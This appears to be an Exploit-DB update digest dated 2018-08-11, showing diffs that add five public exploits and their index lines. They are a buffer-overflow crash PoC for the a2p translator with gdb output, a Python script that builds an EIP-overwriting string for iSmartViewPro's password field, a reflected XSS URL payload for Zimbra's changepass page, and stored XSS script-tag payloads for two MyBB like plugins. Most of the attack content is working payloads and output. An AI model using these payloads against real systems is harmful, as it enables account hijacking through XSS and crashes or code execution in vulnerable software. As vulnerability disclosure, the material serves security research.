DB: 2018-08-11

5 changes to exploits/shellcodes

Awk to Perl 1.007-5 - Buffer Overflow (PoC)

iSmartViewPro 1.5 - 'Password' Buffer Overflow

MyBB Thank You/Like Plugin 3.0.0 - Cross-Site Scripting
Zimbra 8.6.0_GA_1153 - Cross-Site Scripting
MyBB Like Plugin 3.0.0 - Cross-Site Scripting

exploits/linux/local/45009.txt

@@ -0,0 +1,37 @@
+# Exploit Title: Awk to Perl 1.007-5 - Buffer Overflow (PoC)
+# Author: Todor Donev
+# Date: 2018-07-11
+# Software: Linux Awk to Perl Translator '/usr/bin/a2p'
+# Version: 1.007-5
+# CVE: N/A
+# Tested on: CentOS 6.9, Ubuntu 10
+
+[todor@adamantium ~]$ python -c "print 'A' * 2070" | a2p > /dev/null
+Segmentation fault
+[todor@adamantium ~]$ gdb a2p --quiet
+Reading symbols from /usr/bin/a2p...(no debugging symbols found)...done.
+Missing separate debuginfos, use: debuginfo-install *SNIPED*
+(gdb) r bof
+Starting program: /usr/bin/a2p bof
+[Thread debugging using libthread_db enabled]
+
+Program received signal SIGSEGV, Segmentation fault.
+0x0074ee65 in fgets () from /lib/libc.so.6
+(gdb) info reg
+eax            0x1060	4192
+ecx            0x1	1
+edx            0x41414141	1094795585
+ebx            0x880ff4	8916980
+esp            0xbffff0f0	0xbffff0f0
+ebp            0xbffff118	0xbffff118
+esi            0x41414141	1094795585
+edi            0x8062920	134621472
+eip            0x74ee65	0x74ee65 <fgets+53>
+eflags         0x210216	[ PF AF IF RF ID ]
+cs             0x73	115
+ss             0x7b	123
+ds             0x7b	123
+es             0x7b	123
+fs             0x0	0
+gs             0x33	51
+(gdb)

exploits/php/webapps/45177.txt

@@ -0,0 +1,12 @@
+# Exploit Title: Xss Zimbra Mail server
+# Google Dork:
+# Date: 2018/08/10
+# Exploit Author: Dinbar78
+# Vendor Homepage: https://www.zimbra.com/
+
+# Version: 8.6.0_GA_1153 (build 20141215151110)
+# bug 103609 or CVE-2016-3411
+
+
+Payload: es.
+https:// (zimbrasite)/h/changepass?skin="><script>alert('hacked');</script>

exploits/php/webapps/45178.txt

@@ -0,0 +1,24 @@
+# Exploit Title: MyBB Thank You/Like Plugin 3.0.0 - Cross-Site Scripting
+# Date: 8/1/2018
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=360
+# Version: 3.0.0
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2018-14888
+
+
+1. Description:
+This plugin allows users to thank/like other users threads/posts. In user profiles it shows your most liked post/thread, the post/thread subjects aren't sanitized to user input.
+ 
+
+2. Proof of Concept:
+
+- Use the following as the post/thread subject  <script>alert('XSS')</script>
+- Get that post/thread liked by another user (or you)
+- Visit your profile to see alert.
+
+
+3. Solution:
+Update to v3.1.0

exploits/php/webapps/45179.txt

@@ -0,0 +1,19 @@
+# Exploit Title: MyBB Like Plugin 3.0.0 - Cross-Site Scripting
+# Date: 2018-08-01
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=360
+# Version: 3.0.0
+# Tested on: Ubuntu 18.04
+# CVE: N/A
+
+# 1. Description:
+# This plugin allows users to thank/like other users threads/posts. 
+# In user profiles it shows your most liked post/thread, the post/thread 
+# subjects aren't sanitized to user input.
+ 
+# 2. Proof of Concept:
+
+- Use the following as the post/thread subject  <script>alert('XSS')</script>
+- Get that post/thread liked by another user (or you)
+- Visit your profile to see alert.

exploits/windows_x86-64/local/45176.py

@@ -0,0 +1,29 @@
+# Exploit Title: iSmartViewPro 1.5  - 'Password' Buffer Overflow
+# Discovery by: Javier Enrique Rodriguez Gutierrez
+# Discovery Date: 2018-08-09
+# Vendor Homepage: https://securimport.com/
+# Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
+# Tested Version: 1.5
+# Vulnerability Type: Buffer Over Flow Local
+# Tested on OS: Windows 7 Professional x64 es
+  
+# Steps to Produce the BoF: 
+# 1.- Run python code : python generate.py
+# 2.- Open generate.txt and copy content to clipboard
+# 3.- Open iSmartViewPro
+# 4.- clic button "+"
+# 5.- Select "add device manually"
+# 6.- device alias -> "admin"
+# 7.- DNS/IP/DID -> "0.0.0.0"
+# 8.- acount -> "admin"
+# 9.- paste ClipBoard on "Password"
+# 10.- Save
+# 11.- BoF
+ 
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+buffer = "\x41" * 447
+eip = "\x42" * 4
+f = open ("generate.txt", "w")
+f.write(buffer + eip)
+f.close()

files_exploits.csv

@@ -9837,6 +9837,7 @@ id,file,description,date,author,type,platform,port
 44983,exploits/hardware/local/44983.txt,"ADB Broadband Gateways / Routers - Local Root Jailbreak",2018-07-05,"SEC Consult",local,hardware,
 44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware,
 44989,exploits/windows/local/44989.py,"Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)",2018-07-09,Achilles,local,windows,
+45009,exploits/linux/local/45009.txt,"Awk to Perl 1.007-5 - Buffer Overflow (PoC)",2018-07-11,"Todor Donev",local,linux,
 45010,exploits/linux/local/45010.c,"Linux Kernel <  4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux,
 45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows,
 45026,exploits/windows/local/45026.txt,"Microsoft Enterprise Mode Site List Manager - XML External Entity Injection",2018-07-16,hyp3rlinx,local,windows,
@@ -9862,6 +9863,7 @@ id,file,description,date,author,type,platform,port
 45165,exploits/windows_x86-64/local/45165.py,"iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow",2018-08-08,"Rodrigo Eduardo Rodriguez",local,windows_x86-64,
 45166,exploits/windows_x86-64/local/45166.py,"iSmartViewPro 1.5 - 'Account' Buffer Overflow",2018-08-08,"Alan Joaquín Baeza Meza",local,windows_x86-64,
 45175,exploits/linux/local/45175.c,"Linux Kernel  4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read",2018-08-09,"Andrey Konovalov",local,linux,
+45176,exploits/windows_x86-64/local/45176.py,"iSmartViewPro 1.5 - 'Password' Buffer Overflow",2018-08-10,"Javier Enrique Rodriguez Gutierrez",local,windows_x86-64,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39716,6 +39718,7 @@ id,file,description,date,author,type,platform,port
 45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,
 45065,exploits/hardware/webapps/45065.txt,"GeoVision GV-SNVR0811 - Directory Traversal",2018-07-22,"Berk Dusunur",webapps,hardware,
 45030,exploits/hardware/webapps/45030.txt,"VelotiSmart WiFi B-380 Camera - Directory Traversal",2018-07-16,"Miguel Mendez Z",webapps,hardware,80
+45178,exploits/php/webapps/45178.txt,"MyBB Thank You/Like Plugin 3.0.0 - Cross-Site Scripting",2018-08-10,0xB9,webapps,php,
 45015,exploits/hardware/webapps/45015.txt,"QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities",2018-07-13,"Core Security",webapps,hardware,443
 45016,exploits/php/webapps/45016.txt,"Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure",2018-07-13,"SEC Consult",webapps,php,80
 45021,exploits/hardware/webapps/45021.txt,"Cela Link CLR-M20 2.7.1.6 - Arbitrary File Upload",2018-07-13,"Safak Aslan",webapps,hardware,
@@ -39774,3 +39777,5 @@ id,file,description,date,author,type,platform,port
 45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443
 45172,exploits/hardware/webapps/45172.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)",2018-08-09,Wadeek,webapps,hardware,80
 45173,exploits/hardware/webapps/45173.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)",2018-08-09,Wadeek,webapps,hardware,80
+45177,exploits/php/webapps/45177.txt,"Zimbra 8.6.0_GA_1153 - Cross-Site Scripting",2018-08-10,"Dino Barlattani",webapps,php,
+45179,exploits/php/webapps/45179.txt,"MyBB Like Plugin 3.0.0 - Cross-Site Scripting",2018-08-10,0xB9,webapps,php,